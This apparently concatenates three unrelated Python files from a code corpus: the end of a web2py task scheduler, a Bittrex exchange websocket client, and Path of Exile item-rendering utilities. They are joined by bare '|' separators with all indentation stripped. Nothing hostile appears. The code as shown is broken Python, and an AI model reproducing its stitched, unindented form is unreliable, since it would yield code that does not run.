group_names=group_names,
action=DISABLED,
exclude=[DISABLED, KILL, TERMINATE],
limit=limit)
def resume(self, group_names=None, limit=None, worker_name=None):
"""Wakes a worker up (it will be able to process queued tasks)"""
self.set_worker_status(
group_names=group_names,
action=ACTIVE,
exclude=[KILL, TERMINATE],
limit=limit)
def terminate(self, group_names=None, limit=None, worker_name=None):
"""Sets TERMINATE as worker status. The worker will wait for any
currently running tasks to be executed and then it will exit gracefully
"""
self.set_worker_status(
group_names=group_names,
action=TERMINATE,
exclude=[KILL],
limit=limit)
def kill(self, group_names=None, limit=None, worker_name=None):
"""Sets KILL as worker status. The worker will be killed even if it's
processing a task."""
self.set_worker_status(
group_names=group_names,
action=KILL,
limit=limit)
def queue_task(self, function, pargs=[], pvars={}, **kwargs):
"""
Queue tasks. This takes care of handling the validation of all
parameters
Args:
function: the function (anything callable with a __name__)
pargs: "raw" args to be passed to the function. Automatically
jsonified.
pvars: "raw" kwargs to be passed to the function. Automatically
jsonified
kwargs: all the parameters available (basically, every
`scheduler_task` column). If args and vars are here, they
should be jsonified already, and they will override pargs
and pvars
Returns:
a dict just as a normal validate_and_insert(), plus a uuid key
holding the uuid of the queued task. If validation is not passed
( i.e. some parameters are invalid) both id and uuid will be None,
and you'll get an "error" dict holding the errors found.
"""
if hasattr(function, '__name__'):
function = function.__name__
targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs)
tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars)
tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid()
tname = 'task_name' in kwargs and kwargs.pop('task_name') or function
immediate = 'immediate' in kwargs and kwargs.pop('immediate') or None
cronline = kwargs.get('cronline')
kwargs.update(
function_name=function,
task_name=tname,
args=targs,
vars=tvars,
uuid=tuuid,
)
if cronline:
try:
start_time = kwargs.get('start_time', self.now)
next_run_time = CronParser(cronline, start_time).next()
kwargs.update(start_time=start_time, next_run_time=next_run_time)
except Exception:
pass
if 'start_time' in kwargs and 'next_run_time' not in kwargs:
kwargs.update(next_run_time=kwargs['start_time'])
db = self.db
rtn = db.scheduler_task.validate_and_insert(**kwargs)
if not rtn.errors:
rtn.uuid = tuuid
if immediate:
db(
(db.scheduler_worker.is_ticker == True)
).update(status=PICK)
else:
rtn.uuid = None
return rtn
def task_status(self, ref, output=False):
"""
Retrieves task status and optionally the result of the task
Args:
ref: can be
- an integer : lookup will be done by scheduler_task.id
- a string : lookup will be done by scheduler_task.uuid
- a `Query` : lookup as you wish, e.g. ::
db.scheduler_task.task_name == 'test1'
output(bool): if `True`, fetch also the scheduler_run record
Returns:
a single Row object, for the last queued task.
If output == True, returns also the last scheduler_run record.
The scheduler_run record is fetched by a left join, so it can
have all fields == None
"""
from pydal.objects import Query
db = self.db
sr = db.scheduler_run
st = db.scheduler_task
if isinstance(ref, integer_types):
q = st.id == ref
elif isinstance(ref, str):
q = st.uuid == ref
elif isinstance(ref, Query):
q = ref
else:
raise SyntaxError(
"You can retrieve results only by id, uuid or Query")
fields = [st.ALL]
left = False
orderby = ~st.id
if output:
fields = st.ALL, sr.ALL
left = sr.on(sr.task_id == st.id)
orderby = ~st.id | ~sr.id
row = db(q).select(
*fields,
**dict(orderby=orderby,
left=left,
limitby=(0, 1))
).first()
if row and output:
row.result = row.scheduler_run.run_result and \
loads(row.scheduler_run.run_result,
object_hook=_decode_dict) or None
return row
def stop_task(self, ref):
"""Shortcut for task termination.
If the task is RUNNING it will terminate it, meaning that status
will be set as FAILED.
If the task is QUEUED, its stop_time will be set as to "now",
the enabled flag will be set to False, and the status to STOPPED
Args:
ref: can be
- an integer : lookup will be done by scheduler_task.id
- a string : lookup will be done by scheduler_task.uuid
Returns:
- 1 if task was stopped (meaning an update has been done)
- None if task was not found, or if task was not RUNNING or QUEUED
Note:
Experimental
"""
db = self.db
st = db.scheduler_task
sw = db.scheduler_worker
if isinstance(ref, integer_types):
q = st.id == ref
elif isinstance(ref, str):
q = st.uuid == ref
else:
raise SyntaxError(
"You can retrieve results only by id or uuid")
task = db(q).select(st.id, st.status, st.assigned_worker_name)
task = task.first()
rtn = None
if not task:
return rtn
if task.status == 'RUNNING':
q = sw.worker_name == task.assigned_worker_name
rtn = db(q).update(status=STOP_TASK)
elif task.status == 'QUEUED':
rtn = db(q).update(
stop_time=self.now(),
enabled=False,
status=STOPPED)
return rtn
def get_workers(self, only_ticker=False):
""" Returns a dict holding `worker_name : {**columns}`
representing all "registered" workers
only_ticker returns only the workers running as a TICKER,
if there are any
"""
db = self.db
if only_ticker:
workers = db(db.scheduler_worker.is_ticker == True).select()
else:
workers = db(db.scheduler_worker.id).select()
all_workers = {}
for row in workers:
all_workers[row.worker_name] = Storage(
status=row.status,
first_heartbeat=row.first_heartbeat,
last_heartbeat=row.last_heartbeat,
group_names=row.group_names,
is_ticker=row.is_ticker,
worker_stats=row.worker_stats
)
return all_workers
def main():
"""
allows to run worker without python web2py.py .... by simply::
python gluon/scheduler.py
"""
import optparse
parser = optparse.OptionParser()
parser.add_option(
"-w", "--worker_name", dest="worker_name", default=None,
help="start a worker with name")
parser.add_option(
"-b", "--heartbeat", dest="heartbeat", default=10,
type='int', help="heartbeat time in seconds (default 10)")
parser.add_option(
"-L", "--logger_level", dest="logger_level",
default=30,
type='int',
help="set debug output level (0-100, 0 means all, 100 means none;default is 30)")
parser.add_option("-E", "--empty-runs",
dest="max_empty_runs",
type='int',
default=0,
help="max loops with no grabbed tasks permitted (0 for never check)")
parser.add_option(
"-g", "--group_names", dest="group_names",
default='main',
help="comma separated list of groups to be picked by the worker")
parser.add_option(
"-f", "--db_folder", dest="db_folder",
default='/Users/mdipierro/web2py/applications/scheduler/databases',
help="location of the dal database folder")
parser.add_option(
"-u", "--db_uri", dest="db_uri",
default='sqlite://storage.sqlite',
help="database URI string (web2py DAL syntax)")
parser.add_option(
"-t", "--tasks", dest="tasks", default=None,
help="file containing task files, must define" +
"tasks = {'task_name':(lambda: 'output')} or similar set of tasks")
parser.add_option(
"-U", "--utc-time", dest="utc_time", default=False,
help="work with UTC timestamps"
)
(options, args) = parser.parse_args()
if not options.tasks or not options.db_uri:
print(USAGE)
if options.tasks:
path, filename = os.path.split(options.tasks)
if filename.endswith('.py'):
filename = filename[:-3]
sys.path.append(path)
print('importing tasks...')
tasks = __import__(filename, globals(), locals(), [], -1).tasks
print('tasks found: ' + ', '.join(list(tasks.keys())))
else:
tasks = {}
group_names = [x.strip() for x in options.group_names.split(',')]
logging.getLogger().setLevel(options.logger_level)
print('groups for this worker: ' + ', '.join(group_names))
print('connecting to database in folder: ' + options.db_folder or './')
print('using URI: ' + options.db_uri)
db = DAL(options.db_uri, folder=options.db_folder, decode_credentials=True)
print('instantiating scheduler...')
scheduler = Scheduler(db=db,
worker_name=options.worker_name,
tasks=tasks,
migrate=True,
group_names=group_names,
heartbeat=options.heartbeat,
max_empty_runs=options.max_empty_runs,
utc_time=options.utc_time)
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
print('starting main worker loop...')
scheduler.loop()
if __name__ == '__main__':
main()
|
websocket_client.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# bittrex_websocket/websocket_client.py
# Stanislav Lazarov
import logging
from ._logger import add_stream_logger, remove_stream_logger
from threading import Thread
from ._queue_events import *
from .constants import EventTypes, BittrexParameters, BittrexMethods, ErrorMessages, OtherConstants
from ._auxiliary import process_message, create_signature, BittrexConnection
from ._abc import WebSocket
from queue import Queue
from ._exceptions import *
from signalr_aio import Connection
try:
from cfscrape import create_scraper as Session
except ImportError:
from requests import Session
logger = logging.getLogger(__name__)
class BittrexSocket(WebSocket):
def __init__(self, url=None):
self.control_queue = None
self.invokes = []
self.tickers = None
self.connection = None
self.threads = []
self.credentials = None
self.url = BittrexParameters.URL if url is None else url
self._start_main_thread()
def _start_main_thread(self):
self.control_queue = Queue()
self.control_queue.put(ConnectEvent())
thread = Thread(target=self.control_queue_handler, daemon=True, name='ControlQueueThread')
self.threads.append(thread)
thread.start()
def control_queue_handler(self):
while True:
event = self.control_queue.get()
if event is not None:
if event.type == EventTypes.CONNECT:
self._handle_connect()
elif event.type == EventTypes.SUBSCRIBE:
self._handle_subscribe(event.invoke, event.payload)
elif event.type == EventTypes.RECONNECT:
self._handle_reconnect(event.error_message)
elif event.type == EventTypes.CLOSE:
self.connection.conn.close()
break
self.control_queue.task_done()
def _handle_connect(self):
connection = Connection(self.url, Session())
hub = connection.register_hub(BittrexParameters.HUB)
connection.received += self._on_debug
connection.error += self.on_error
hub.client.on(BittrexParameters.MARKET_DELTA, self._on_public)
hub.client.on(BittrexParameters.SUMMARY_DELTA, self._on_public)
hub.client.on(BittrexParameters.SUMMARY_DELTA_LITE, self._on_public)
hub.client.on(BittrexParameters.BALANCE_DELTA, self._on_private)
hub.client.on(BittrexParameters.ORDER_DELTA, self._on_private)
self.connection = BittrexConnection(connection, hub)
thread = Thread(target=self._connection_handler, daemon=True, name='SocketConnectionThread')
self.threads.append(thread)
thread.start()
def _connection_handler(self):
if str(type(self.connection.conn.session)) == OtherConstants.CF_SESSION_TYPE:
logger.info('Establishing connection to Bittrex through {}.'.format(self.url))
logger.info('cfscrape detected, using a cfscrape session instead of requests.')
else:
logger.info('Establishing connection to Bittrex through {}.'.format(self.url))
try:
self.connection.conn.start()
except ConnectionClosed as e:
if e.code == 1000:
logger.info('Bittrex connection successfully closed.')
elif e.code == 1006:
event = ReconnectEvent(e.args[0])
self.control_queue.put(event)
except ConnectionError as e:
raise ConnectionError(e)
except InvalidStatusCode as e:
message = "Status code not 101: {}".format(e.status_code)
event = ReconnectEvent(message)
self.control_queue.put(event)
def _handle_subscribe(self, invoke, payload):
if invoke in [BittrexMethods.SUBSCRIBE_TO_EXCHANGE_DELTAS, BittrexMethods.QUERY_EXCHANGE_STATE]:
for ticker in payload[0]:
self.invokes.append({'invoke': invoke, 'ticker': ticker})
self.connection.corehub.server.invoke(invoke, ticker)
logger.info('Successfully subscribed to [{}] for [{}].'.format(invoke, ticker))
elif invoke == BittrexMethods.GET_AUTH_CONTENT:
self.connection.corehub.server.invoke(invoke, payload[0])
self.invokes.append({'invoke': invoke, 'ticker': payload[0]})
logger.info('Retrieving authentication challenge.')
elif invoke == BittrexMethods.AUTHENTICATE:
self.connection.corehub.server.invoke(invoke, payload[0], payload[1])
logger.info('Challenge retrieved. Sending authentication. Awaiting messages...')
# No need to append invoke list, because AUTHENTICATE is called from successful GET_AUTH_CONTENT.
else:
self.invokes.append({'invoke': invoke, 'ticker': None})
self.connection.corehub.server.invoke(invoke)
logger.info('Successfully invoked [{}].'.format(invoke))
def _handle_reconnect(self, error_message):
logger.error('{}.'.format(error_message))
logger.error('Initiating reconnection procedure')
events = []
for item in self.invokes:
event = SubscribeEvent(item['invoke'], item['ticker'])
events.append(event)
# Reset previous connection
ws_loop = self.connection.conn._Connection__transport.ws_loop
self.connection.conn.close()
ws_loop._default_executor.shutdown(wait=False)
ws_loop._default_executor = None
self.invokes, self.connection = [], None
# Restart
self.control_queue.put(ConnectEvent())
for event in events:
self.control_queue.put(event)
# ==============
# Public Methods
# ==============
def subscribe_to_exchange_deltas(self, tickers):
if type(tickers) is list:
invoke = BittrexMethods.SUBSCRIBE_TO_EXCHANGE_DELTAS
event = SubscribeEvent(invoke, tickers)
self.control_queue.put(event)
else:
raise TypeError(ErrorMessages.INVALID_TICKER_INPUT)
def subscribe_to_summary_deltas(self):
invoke = BittrexMethods.SUBSCRIBE_TO_SUMMARY_DELTAS
event = SubscribeEvent(invoke, None)
self.control_queue.put(event)
def subscribe_to_summary_lite_deltas(self):
invoke = BittrexMethods.SUBSCRIBE_TO_SUMMARY_LITE_DELTAS
event = SubscribeEvent(invoke, None)
self.control_queue.put(event)
def query_summary_state(self):
invoke = BittrexMethods.QUERY_SUMMARY_STATE
event = SubscribeEvent(invoke, None)
self.control_queue.put(event)
def query_exchange_state(self, tickers):
if type(tickers) is list:
invoke = BittrexMethods.QUERY_EXCHANGE_STATE
event = SubscribeEvent(invoke, tickers)
self.control_queue.put(event)
else:
raise TypeError(ErrorMessages.INVALID_TICKER_INPUT)
def authenticate(self, api_key, api_secret):
self.credentials = {'api_key': api_key, 'api_secret': api_secret}
event = SubscribeEvent(BittrexMethods.GET_AUTH_CONTENT, api_key)
self.control_queue.put(event)
def disconnect(self):
self.control_queue.put(CloseEvent())
# =======================
# Private Channel Methods
# =======================
async def _on_public(self, args):
msg = await process_message(args[0])
if 'D' in msg:
if len(msg['D'][0]) > 3:
msg['invoke_type'] = BittrexMethods.SUBSCRIBE_TO_SUMMARY_DELTAS
else:
msg['invoke_type'] = BittrexMethods.SUBSCRIBE_TO_SUMMARY_LITE_DELTAS
else:
msg['invoke_type'] = BittrexMethods.SUBSCRIBE_TO_EXCHANGE_DELTAS
await self.on_public(msg)
async def _on_private(self, args):
msg = await process_message(args[0])
await self.on_private(msg)
async def _on_debug(self, **kwargs):
# `QueryExchangeState`, `QuerySummaryState` and `GetAuthContext` are received in the debug channel.
await self._is_query_invoke(kwargs)
async def _is_query_invoke(self, kwargs):
if 'R' in kwargs and type(kwargs['R']) is not bool:
invoke = self.invokes[int(kwargs['I'])]['invoke']
if invoke == BittrexMethods.GET_AUTH_CONTENT:
signature = await create_signature(self.credentials['api_secret'], kwargs['R'])
event = SubscribeEvent(BittrexMethods.AUTHENTICATE, self.credentials['api_key'], signature)
self.control_queue.put(event)
else:
msg = await process_message(kwargs['R'])
if msg is not None:
msg['invoke_type'] = invoke
msg['ticker'] = self.invokes[int(kwargs['I'])].get('ticker')
await self.on_public(msg)
# ======================
# Public Channel Methods
# ======================
async def on_public(self, msg):
pass
async def on_private(self, msg):
pass
async def on_error(self, args):
logger.error(args)
# =============
# Other Methods
# =============
@staticmethod
def enable_log(file_name=None):
"""
Enables logging.
:param file_name: The name of the log file, located in the same directory as the executing script.
:type file_name: str
"""
add_stream_logger(file_name=file_name)
@staticmethod
def disable_log():
"""
Disables logging.
"""
remove_stream_logger()
|
utils.py | import binascii
import html
import json as js
import math
import os
import re
import threading
import unicodedata
import xml.etree.cElementTree as Etree
from collections import defaultdict
from collections import namedtuple
from io import BytesIO
from queue import Queue
import urllib3
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from bs4 import BeautifulSoup as Soup
from poe.exceptions import AbsentItemBaseException
from poe.exceptions import OutdatedPoBException, RequestException
from poe.models import Weapon, Armour, PassiveSkill, Gem
from poe.price import ItemPriceQuery, CurrencyQuery
from .constants import *
re_range = re.compile(r'\(.+?\)')
# Simple cursor class that lets me handle moving around the image quite well
# also get around the hassle of maintaining position and adding and subtracting.
def strip_unicode(text: str):
return ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))
class Cursor:
def __init__(self, x_start):
self.x = 0
self.y = 0
self.x_start = x_start
# Return current pos of cursor
@property
def pos(self):
return self.x, self.y
def move_x(self, quantity):
self.x += quantity
def move_y(self, quantity):
self.y += quantity
def reset_x(self):
self.x = self.x_start
# Cause relative paths are ass
_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data')
# Find links wrapped in [[]] returned by Gamepedia
reg = re.compile(r'\[\[[^\]]+\]\]')
try:
with open(f"{_dir}/keystones.json") as f:
keystones = js.load(f)
with open(f"{_dir}/ascendancy.json") as f:
asc_nodes = js.load(f)
with open(f"{_dir}/items.json") as f:
items = js.load(f)
except Exception:
pass
def unescape_to_list(props, ret_matches=False):
matches = reg.findall(props)
has_table = Soup(html.unescape(props)).select_one('table.mw-collapsed tr')
if not has_table:
for match in set(matches):
if '|' in match:
props = props.replace(match, match.split('|')[1].strip(']]'))
else:
props = props.replace(match, match.strip('[[]]'))
prop_list = html.unescape(props).replace('<br />', '<br>').split('<br>')
prop_list = [x.replace('<em class="tc -corrupted">', '').replace('</em>', '') for x in prop_list]
else:
# FIXME: non-iterable object
prop_list = [x.text for x in has_table]
if ret_matches:
return prop_list, matches
return prop_list
class ItemRender:
def __init__(self, flavor):
self.flavor = flavor.lower()
self.font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 15)
self.lore_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCapsItalic.ttf', 15)
self.header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
self.namebar_left = Image.open(f'{_dir}//{self.flavor}_namebar_left.png').convert('RGBA')
self.namebar_right = Image.open(f'{_dir}//{self.flavor}_namebar_right.png').convert('RGBA')
self.namebar_trans = Image.open(f'{_dir}//{self.flavor}_namebar_trans.png').convert('RGBA')
self.separator = Image.open(f'{_dir}//{self.flavor}_separator.png').convert('RGBA')
self.div_frame = Image.open(f'{_dir}//div_frame.png').convert('RGBA')
self.elder_badge = Image.open(f'{_dir}//elder_badge.png').convert('RGBA')
self.shaper_badge = Image.open(f'{_dir}//shaper_badge.png').convert('RGBA')
self.redeemer_badge = Image.open(f'{_dir}//redeemer_badge.png').convert('RGBA')
self.crusader_badge = Image.open(f'{_dir}//crusader_badge.png').convert('RGBA')
self.hunter_badge = Image.open(f'{_dir}//hunter_badge.png').convert('RGBA')
self.warlord_badge = Image.open(f'{_dir}//warlord_badge.png').convert('RGBA')
self.passive_frame = Image.open(f'{_dir}//passive_frame.png').convert('RGBA')
self.keystone_frame = Image.open(f'{_dir}//keystone_frame.png').convert('RGBA')
self.notable_frame = Image.open(f'{_dir}//notable_frame.png').convert('RGBA')
self.ascendancy_frame = Image.open(f'{_dir}//ascendancy_frame.png').convert('RGBA')
self.shaper_backgrounds = {
('1', '1'): Image.open(f'{_dir}//shaper_bg_1x1.png').convert('RGBA'),
('1', '2'): Image.open(f'{_dir}//shaper_bg_1x2.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//shaper_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//shaper_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//shaper_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//shaper_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//shaper_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//shaper_bg_2x4.png').convert('RGBA'),
}
self.elder_backgrounds = {
('1', '1'): Image.open(f'{_dir}//elder_bg_1x1.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//elder_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//elder_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//elder_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//elder_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//elder_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//elder_bg_2x4.png').convert('RGBA'),
}
# A namedtuple to handle properties.
# This works fairly well except for Separators which is kinda hacky
self.prop = namedtuple('Property', ['title', 'text', 'color'])
# I don't know why PIL does this, but spacing with fonts is not consistent,
# this means I have to compensate by spacing more after separators and stuff
self.last_action = str()
# Go through our total properties and image to get the image/box size
# I feel the code is a bit redundant considering I have two instances
# of an if-fest, calc_size and sort_stats.
# TODO: reduce redundancy
def calc_size(self, stats, header):
width = self.header_font.getsize(header)[0] + (self.namebar_left.size[0] * 2) + 4
height = 0
last_sep = False
for stat in stats:
if stat.title == "Separator":
height += SEPARATOR_HEIGHT + SEPARATOR_SPACING
last_sep = True
continue
elif stat.title == "Elemental Damage:":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
last_sep = False
elif stat.title == "Requires":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for attr in stat.text.keys():
stat_text += f" {attr.title()} {stat.text[attr]}{'' if list(stat.text.keys())[-1] == attr else ','}"
last_sep = False
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
ht = LINE_SPACING
for line in stat.text:
w = self.lore_font.getsize(line)
ht += STAT_HEIGHT
if w[0] > width:
width = w[0]
height += ht + STAT_SPACING
else:
w = self.lore_font.getsize(stat.text)
if w[0] > width:
width = w[0]
height += STAT_HEIGHT
last_sep = False
continue
elif stat.title == "Image":
height += stat.text.size[1] + IMAGE_PADDING
last_sep = False
else:
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = f"{stat.title}{stat.text}"
last_sep = False
if stat.title != "Image":
# FIXME: referenced before assignment
w = self.font.getsize(stat_text)
else:
w = stat.text.size
if w[0] > width:
width = w[0]
# 34 is the 17px padding from both sides
return width + 34, height + self.namebar_trans.size[1] + 25
def sort_stats(self, item):
stats = list()
separator = self.prop("Separator", None, None)
if not isinstance(item, PassiveSkill):
if 'weapon' in item.tags:
stats.append(self.prop(item.item_class, '', DESC_COLOR))
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.physical_damage:
stats.append(self.prop("Physical Damage: ", item.physical_damage, PROP_COLOR))
elements = {
element.split('_')[0]: getattr(item, element) for element in [
'fire_damage', 'cold_damage', 'lightning_damage'
] if hasattr(item, element)
}
if elements:
stats.append(self.prop("Elemental Damage:", elements, None))
if item.chaos_damage:
stats.append(self.prop("Chaos Damage: ", item.chaos_damage, CHAOS_COLOR))
if item.critical_chance:
stats.append(self.prop("Critical Strike Chance: ", item.critical_chance, None))
if item.attack_speed:
stats.append(self.prop("Attacks Per Second: ", item.attack_speed, PROP_COLOR))
if int(item.range):
stats.append(self.prop("Weapon Range: ", item.range, None))
stats.append(separator)
elif 'armour' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.block:
stats.append(self.prop("Chance To Block: ", f"{item.block}%", PROP_COLOR))
if item.armour:
stats.append(self.prop("Armour: ", item.armour, PROP_COLOR))
if item.evasion:
stats.append(self.prop("Evasion: ", item.evasion, PROP_COLOR))
if item.energy_shield:
stats.append(self.prop("Energy Shield: ", item.energy_shield, PROP_COLOR))
stats.append(separator)
elif 'ring' in item.tags or 'amulet' in item.tags or 'belt' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
stats.append(separator)
elif 'gem' in item.tags:
stats.append(self.prop(item.gem_tags.replace(',', ', '), '', DESC_COLOR))
if item.stats_per_level[0]['mana multiplier']:
stats.append(self.prop("Mana Multiplier: ", f"{item.stats_per_level[0]['mana multiplier']}%", None))
if item.radius:
stats.append(self.prop("Radius: ", item.radius, None))
if not item.is_aura:
# Enlighten Enhance etc only go up to 10
try:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[20]['mana cost']})", PROP_COLOR)
)
except KeyError:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[10]['mana cost']})", PROP_COLOR)
)
else:
stats.append(self.prop("Mana Reserved: ", f"{item.stats_per_level[0]['mana cost']}%", None))
# Enlighten Enhance etc only go up to 10
try:
if item.stats_per_level[20]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[20]['stored uses']}, None))
except KeyError:
if item.stats_per_level[10]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[10]['stored uses']}, None))
if item.stats_per_level[0]['cooldown']:
stats.append(self.prop("Cooldown Time: ", f"{item.stats_per_level[0]['cooldown']} sec", None))
if item.cast_time:
stats.append(self.prop("Cast Time: ", f"{item.cast_time} sec", None))
if item.stats_per_level[0]['critical strike chance']:
stats.append(
self.prop("Critical Strike Chance: ", f"{item.stats_per_level[0]['critical strike chance']}%", None)
)
if item.stats_per_level[0]['damage effectiveness']:
stats.append(
self.prop("Damage Effectiveness: ", f"{item.stats_per_level[0]['damage effectiveness']}%", None)
)
stats.append(separator)
elif item.base == 'Prophecy':
if len(item.lore.split(' ')) > 7:
lore = item.lore.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop('Lore', item.lore, UNIQUE_COLOR))
stats.append(separator)
obj_list, matches = unescape_to_list(item.objective, ret_matches=True)
if 'while holding' in obj_list[0]:
item_name = matches[3].split('|')[1].strip(']]')
pre_holding = obj_list[0].split(' while holding ')[0]
new_obj = f"{pre_holding} while holding {item_name}"
else:
new_obj = obj_list[0]
if len(new_obj.split(' ')) > 7:
obj_split = new_obj.split(' ')
obj_sep = [obj_split[x:x + 7] for x in range(0, len(obj_split), 7)]
for line in obj_sep:
stats.append(self.prop(' '.join(line), '', None))
else:
stats.append(self.prop(new_obj, '', None))
stats.append(separator)
stats.append(self.prop("Seal Cost: ", item.seal_cost, DESC_COLOR))
if item.requirements.has_reqs and item.base != "Prophecy":
reqs = {}
if item.requirements.level:
reqs['level'] = item.requirements.level
if item.requirements.str:
reqs['str'] = item.requirements.str
if item.requirements.dex:
reqs['dex'] = item.requirements.dex
if item.requirements.int:
reqs['int'] = item.requirements.int
stats.append(self.prop("Requires", reqs, None))
stats.append(separator)
try:
if item.enchant:
stats.append(self.prop(item.enchant, '', CRAFTED))
stats.append(separator)
except AttributeError:
pass
if 'gem' in item.tags:
if len(item.description.split(' ')) > 7:
desc = item.description.split(' ')
description = [desc[x:x + 7] for x in range(0, len(desc), 7)]
for line in description:
stats.append(self.prop(' '.join(line), '', GEM_COLOR))
else:
stats.append(self.prop(item.description, '', GEM_COLOR))
stats.append(separator)
if item.quality_bonus:
stats.append(self.prop("Per 1% Quality:", "", DESC_COLOR))
if '<br>' in item.quality_bonus:
for bonus in item.quality_bonus.split('<br>'):
stats.append(self.prop(bonus, "", PROP_COLOR))
else:
stats.append(self.prop(item.quality_bonus, "", PROP_COLOR))
stats.append(separator)
stat_text = item.stat_text.split("<br>")
for stat in stat_text:
if len(stat.split(' ')) > 7:
st = stat.split(' ')
sep_stat = [st[x:x + 7] for x in range(0, len(st), 7)]
for sep in sep_stat:
stats.append(self.prop(' '.join(sep), "", PROP_COLOR))
else:
stats.append(self.prop(stat, "", PROP_COLOR))
stats.append(separator)
stats.append(self.prop("Gem Help", "Place into an item socket of the right", DESC_COLOR))
stats.append(self.prop("Gem Help", "colour to gain this skill. Right click to", DESC_COLOR))
stats.append(self.prop("Gem Help", "remove from a socket.", DESC_COLOR))
if 'gem' not in item.tags and item.base != "Prophecy":
if item.implicits:
implicits = unescape_to_list(item.implicits)
else:
implicits = None
if item.explicits:
explicits = unescape_to_list(item.explicits)
else:
explicits = None
if explicits and explicits[0].startswith('{'):
implicits = [explicits[0]]
explicits.pop(0)
if implicits:
for implicit in implicits:
stats.append(self.prop(implicit, '', PROP_COLOR))
stats.append(separator)
if explicits:
for explicit in explicits:
if explicit in item.lore:
continue
if explicit.lower() == "corrupted":
stats.append(self.prop(explicit, '', CORRUPTED))
elif "(crafted)" in explicit or "{crafted}" in explicit:
stats.append(
self.prop(explicit.replace('{crafted}', '').replace(' (crafted)', ''), '', CRAFTED)
)
else:
stats.append(self.prop(explicit, '', PROP_COLOR))
if item.lore:
if stats[-1] is not separator:
stats.append(separator)
lore = self.prop('Lore', unescape_to_list(item.lore), UNIQUE_COLOR)
stats.append(lore)
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
else:
if item.name:
stats.append(self.prop('', item.name, DESC_COLOR))
passive_type = None
if item.asc_class:
passive_type = f"{item.asc_class} Notable Passive Skill"
elif item.is_notable:
passive_type = "Notable Passive Skill"
elif item.is_keystone:
passive_type = "Keystone"
stats.append(self.prop(passive_type, '', NORMAL_COLOR))
for line in unescape_to_list(item.stat_text):
stats.append(self.prop(line, '', PROP_COLOR))
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
# FIXME: unresolved attribute
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
if item.reminder_text:
lines = unescape_to_list(item.reminder_text)
for line in lines:
if len(line.split(' ')) > 7:
lore = line.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for set_line in sep_lore:
stats.append(self.prop('Reminder', ' '.join(set_line), DESC_COLOR))
else:
stats.append(self.prop("Reminder", line, DESC_COLOR))
if item.flavor_text:
if len(item.flavor_text.split(' ')) > 7:
lore = item.flavor_text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop("Lore", item.flavor_text, UNIQUE_COLOR))
return stats
def render_divcard(self, card):
http = urllib3.PoolManager()
r = http.request('GET', card.card_art, preload_content=False)
art = Image.open(BytesIO(r.read()))
art = art.convert('RGBA')
item = Image.new('RGBA', self.div_frame.size, (255, 0, 0, 0))
cur = Cursor(self.div_frame.size[0] // 2)
cur.reset_x()
cur.move_x((art.size[0] // 2) * -1)
cur.move_y(47)
item.alpha_composite(art, cur.pos)
item.alpha_composite(self.div_frame, (0, 0))
cur.reset_x()
d = ImageDraw.Draw(item)
cur.y = 0
cur.move_y(20)
